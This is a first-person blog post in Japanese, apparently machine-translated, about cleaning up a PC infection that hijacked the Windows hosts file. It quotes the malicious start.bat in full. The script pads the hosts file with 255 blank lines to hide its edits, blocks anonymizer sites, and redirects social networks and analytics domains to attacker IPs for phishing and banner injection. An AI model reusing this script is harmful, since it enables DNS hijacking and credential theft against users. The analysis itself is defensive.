簡単な侵入または簡単なウイルスとの闘い

エキサイティングなアクションは、コンピューター上で非常に予期せず行われますが、原則として、最も不適切な瞬間に行われます。 すべては簡単に始まり、お気に入りのサイトやソーシャルネットワークにアクセスして、異常なものを見つけます...



それは私のコンピューターで起こりました。 サイトにアクセスすると、左隅に下品な画像（広告バナー）が表示されます。 私の頭の中に2つの考えが浮かびました：

• 私のブラウザは感染しています
• サイトが感染しています

いくつかのサイトをさまよい、このバナー自体が表示されなかった後、サイトがまだ感染していると判断しました。 これはかなり大きな会社のサイトだったので、私はそれらを呼び出しました。 サポート。 私たちは耳を傾け、警戒に感謝の意を表明しましたが、会話中に、このバナーはどのブラウザにも表示されていないと報告しました。

サイト分析

サイトの調査を始めたところ、Yandexメトリックコードに次のような行があることがわかりました。

<noscript><div><img src="//mc.yandex.ru/watch/image2.jpg" style="position:absolute; ..." alt=""></div></noscript>
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

バナーを表示するのは彼女です。 タグ内でこれがどのように行われるかは完全には明らかではありませんが、画像へのリンクがフィッシングであることは明らかです。

ホストファイル

ホストファイルに送信されます（％windir％\ system32 \ drivers \ etc \ hosts）。

そして、ここで私は重大な間違いを犯しました ：開いた、見た、全体、閉じました。 ただし、表示されるスクロールバーには注意を払いませんでした。

オートロード

スタートアップ（Start-> Run-> msconfig）に進み 、次の内容のファイルstart.batを見つけます。

 FOR /L %%i IN (1,1,255) DO echo. >> %windir%\system32\drivers\etc\hosts echo 127.0.0.1 obhodilka.ru raskruty.ru jelya.ru pinun.ru websplatt.ru diazoom.ru anonim.ttu.su >> %windir%\system32\drivers\etc\hosts echo 127.0.0.1 webvpn.org unboo.ru anonim.do.am anonimvk.ru nemir.ru vkanonim.ru nezayti.ru >> %windir%\system32\drivers\etc\hosts echo 127.0.0.1 webmurk.ru waitplay.ru dostupest.ru anonimix.ru nekontakt2.ru hellhead.ru >> %windir%\system32\drivers\etc\hosts echo 127.0.0.1 razblokirovatdostup.ru antiblock.ru dardan.ru o.vhodilka.ru cameleo.ru spoolls.com >> %windir%\system32\drivers\etc\hosts echo 127.0.0.1 adminimus.ru netdostupa.com dostyp.ru anonymizer.ru xy4-anonymizer.ru v.vhodilka.ru >> %windir%\system32\drivers\etc\hosts echo 127.0.0.1 vhodilka.ru ok-anonimaizer.ru neklassniki.ru timp.ru urlbl.ru workandtalk.ru >> %windir%\system32\drivers\etc\hosts echo 46.251.249.137 m.odnoklassniki.ru my.mail.ru www.odnoklassniki.ru vk.com odnoklassniki.ru m.vk.com wap.odnoklassniki.ru >> %windir%\system32\drivers\etc\hosts echo 46.251.249.136 mc.yandex.ru admulti.com counter.rambler.ru counter.spylog.com www.google-analytics.com >> %windir%\system32\drivers\etc\hosts.txt
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

ホストのバッチファイルの最初の行が255の空行を作成することが明らかになります。 ホストを見て、何も見えなかったのはそのためです。 変更に気づくために最後まで行く必要がありました。



したがって、Google AnalyticsとYandexのメトリックが存在するすべてのサイトで、このバナーが表示されました。 また、すべてのソーシャルネットワークには、「敵」へのページへのアクセスを簡単に提供できるフィッシングサイトが添付されていました。



すべてが適切に配置されたため、起動からバッチファイルを削除し、ホストをクリーンアップする必要がありました。 害虫がコンピューターに侵入する方法は謎のままでした。

おわりに

このストーリー全体では、次のことが驚くべきままです。

• Kaspersky Anti-Virusがコンピューターにインストールされましたが、ホストファイルの変更、スタートアップへのバッチファイルの追加、バナーの表示（フルスキャン後であっても）に苦労した兆候は見られませんでした。
• OS Windows 7では、各ブートでstart.batを非常に穏やかに実行できました。